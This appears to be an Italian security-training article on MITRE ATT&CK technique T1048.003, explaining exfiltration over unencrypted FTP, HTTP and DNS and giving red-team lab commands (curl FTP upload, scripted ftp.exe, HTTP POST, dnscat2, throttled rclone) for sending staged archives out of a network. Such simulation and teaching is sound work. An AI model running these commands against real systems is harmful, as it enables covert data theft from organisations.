Esfiltrazione in Chiaro: Exfiltration Over Unencrypted Non-C2 Protocol (T1048.003)

Quando un avversario ha già raccolto i dati che gli interessano, deve portarli fuori dalla rete — e spesso sceglie di farlo attraverso protocolli non cifrati del tutto diversi dal canale command-and-control già attivo. La tecnica T1048.003 descrive esattamente questo scenario: l'uso di FTP, HTTP, DNS, SMTP o TFTP come veicolo di esfiltrazione, separato dal C2 primario. Appartiene alla tattica TA0010 – Exfiltration, la fase della kill chain in cui l'attaccante trasferisce il bottino verso l'esterno.

Il dato può essere offuscato con encoding come Base64 o compresso in archivi RAR/ZIP, ma transita su protocolli nativamente in chiaro. Questa scelta è deliberata: FTP e HTTP generano volumi di traffico enormi in ogni rete aziendale, e mimetizzarsi dentro quel rumore è più semplice che costruire tunnel cifrati personalizzati. L'approccio è diffuso in modo trasversale — 11 gruppi APT, 22 software e 1 campagna documentata lo adottano. Le mitigazioni formali censite sono 4, tutte orientate al filtraggio di rete e alla prevenzione della perdita di dati. Il protocollo più abusato resta FTP, seguito da HTTP POST e dal tunneling DNS via sottodomini.


L'obiettivo in laboratorio è dimostrare quanto sia banale far uscire dati sensibili su protocolli consentiti dal firewall. Non servono exploit: bastano utility native del sistema operativo.

Esfiltrazione via FTP con curl — esattamente come documentato per PUBLOAD, che carica archivi RAR su un server FTP controllato dall'attaccante. In un ambiente lab con un server FTP locale (ad esempio vsftpd), il comando è immediato:

curl -T /tmp/exfil.rar ftp://labuser:labpass@/upload/

Su Windows, il binario nativo ftp.exe è disponibile senza installazioni aggiuntive. Si può scriptare una sessione interattiva con un file di comandi:

echo open > %TEMP%\ftp.txt & echo user labuser labpass >> %TEMP%\ftp.txt & echo binary >> %TEMP%\ftp.txt & echo put C:\staging\data.rar >> %TEMP%\ftp.txt & echo bye >> %TEMP%\ftp.txt & ftp -s:%TEMP%\ftp.txt

Esfiltrazione via HTTP POST — replica il pattern usato da FIN6 per inviare dati di carte di pagamento. Con curl è sufficiente un POST multipart:

curl -X POST -F "file=@/tmp/exfil.tar.gz" /upload

DNS tunneling — la tecnica preferita da APT32 e impiegata da APT41 nella campagna C0017. Lo strumento dnscat2 (open source) permette di incapsulare dati nei campi subdomain delle query DNS. Lato server si avvia il listener, lato client si esegue:

dnscat --dns server=,port=53 --secret=labkey

Per una simulazione più controllata, Rclone (open source) permette di configurare un remote FTP o HTTP WebDAV e trasferire file con un singolo comando:

rclone copy /tmp/staging/ ftpremote:/exfil/ --transfers 1 --bwlimit 100k

Il flag --bwlimit è utile per simulare l'esfiltrazione lenta tipica degli APT che vogliono evitare spike di traffico. Infine, su macOS, WindTail sfrutta il binario nativo /usr/bin/curl — il che dimostra che anche ambienti Apple sono vulnerabili senza alcun tool aggiuntivo.

Un buon report red team dovrebbe documentare quale protocollo ha superato i controlli DLP, a quale velocità, e se il SOC ha generato alert. La differenza tra "l'FTP era aperto" e "abbiamo esfiltrato 2 GB in 40 minuti senza alert" è quella che convince il board ad investire.


Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo